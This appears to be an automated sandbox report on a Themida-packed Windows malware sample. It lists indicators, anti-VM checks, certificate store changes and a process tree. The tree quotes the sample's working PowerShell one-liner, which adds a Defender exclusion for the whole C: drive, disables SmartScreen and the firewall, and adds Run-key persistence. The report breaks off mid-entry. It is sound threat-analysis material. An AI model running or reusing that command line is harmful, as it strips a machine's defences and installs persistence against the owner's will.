Analysis
-
max time kernel
300s -
max time network
164s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
02-08-2022 22:17
Behavioral task
behavioral1
Sample
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
Resource
win10-20220718-en
General
-
Target
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe
-
Size
3.4MB
-
MD5
55a6d22be09d762103ae315f97b58561
-
SHA1
f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
-
SHA256
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
-
SHA512
4b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
UpSys.exeUpSys.exeUpSys.exepid process 2036 UpSys.exe 108 UpSys.exe 316 UpSys.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe -
Drops startup file 1 IoCs
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe -
Loads dropped DLL 2 IoCs
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exepowershell.exepid process 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 1112 powershell.exe -
Processes:
resource yara_rule behavioral1/memory/892-54-0x000000013FF90000-0x00000001408E8000-memory.dmp themida behavioral1/memory/892-55-0x000000013FF90000-0x00000001408E8000-memory.dmp themida behavioral1/memory/892-56-0x000000013FF90000-0x00000001408E8000-memory.dmp themida behavioral1/memory/892-57-0x000000013FF90000-0x00000001408E8000-memory.dmp themida \ProgramData\MicrosoftNetwork\System.exe themida behavioral1/memory/892-86-0x000000013FF90000-0x00000001408E8000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe -
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exepid process 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe -
Drops file in Windows directory 1 IoCs
Processes:
makecab.exedescription ioc process File created C:\Windows\Logs\CBS\CbsPersist_20220803001822.cab makecab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
UpSys.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" UpSys.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 801c988acea6d801 powershell.exe -
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exepowershell.exeUpSys.exeUpSys.exepowershell.exepid process 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 1112 powershell.exe 2036 UpSys.exe 2036 UpSys.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 108 UpSys.exe 108 UpSys.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 684 powershell.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeUpSys.exeUpSys.exepowershell.exedescription pid process Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 2036 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 2036 UpSys.exe Token: SeIncreaseQuotaPrivilege 2036 UpSys.exe Token: 0 2036 UpSys.exe Token: SeDebugPrivilege 108 UpSys.exe Token: SeAssignPrimaryTokenPrivilege 108 UpSys.exe Token: SeIncreaseQuotaPrivilege 108 UpSys.exe Token: SeDebugPrivilege 684 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exepowershell.exeUpSys.exedescription pid process target process PID 892 wrote to memory of 1112 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe powershell.exe PID 892 wrote to memory of 1112 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe powershell.exe PID 892 wrote to memory of 1112 892 41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe powershell.exe PID 1112 wrote to memory of 2036 1112 powershell.exe UpSys.exe PID 1112 wrote to memory of 2036 1112 powershell.exe UpSys.exe PID 1112 wrote to memory of 2036 1112 powershell.exe UpSys.exe PID 1112 wrote to memory of 2024 1112 powershell.exe netsh.exe PID 1112 wrote to memory of 2024 1112 powershell.exe netsh.exe PID 1112 wrote to memory of 2024 1112 powershell.exe netsh.exe PID 316 wrote to memory of 684 316 UpSys.exe powershell.exe PID 316 wrote to memory of 684 316 UpSys.exe powershell.exe PID 316 wrote to memory of 684 316 UpSys.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe"C:\Users\Admin\AppData\Local\Temp\41d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)2⤵
- Modifies security service
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"6⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220803001822.log C:\Windows\Logs\CBS\CbsPersist_20220803001822.cab1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
C:\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
\ProgramData\MicrosoftNetwork\System.exeFilesize
3.4MB
MD555a6d22be09d762103ae315f97b58561
SHA1f218c5bb6b7e3cbe9483f8bc4552edb180fd2bd1
SHA25641d424435f37d0aa9dd6c2c2b05210f9e0a29a5969362776845064188f97273a
SHA5124b8967e85ebca846bda3910dac537b360fd36163eb778b6f3c522273d9ac0ae2821536c50a40eb3b56938396166ab83d75e7999dc32fe8807d734a479bdce820
-
\ProgramData\UpSys.exeFilesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
memory/684-85-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmpFilesize
11.4MB
-
memory/684-84-0x000007FEF3A00000-0x000007FEF4423000-memory.dmpFilesize
10.1MB
-
memory/684-89-0x000000000266B000-0x000000000268A000-memory.dmpFilesize
124KB
-
memory/684-88-0x0000000002664000-0x0000000002667000-memory.dmpFilesize
12KB
-
memory/684-82-0x0000000000000000-mapping.dmp
-
memory/892-55-0x000000013FF90000-0x00000001408E8000-memory.dmpFilesize
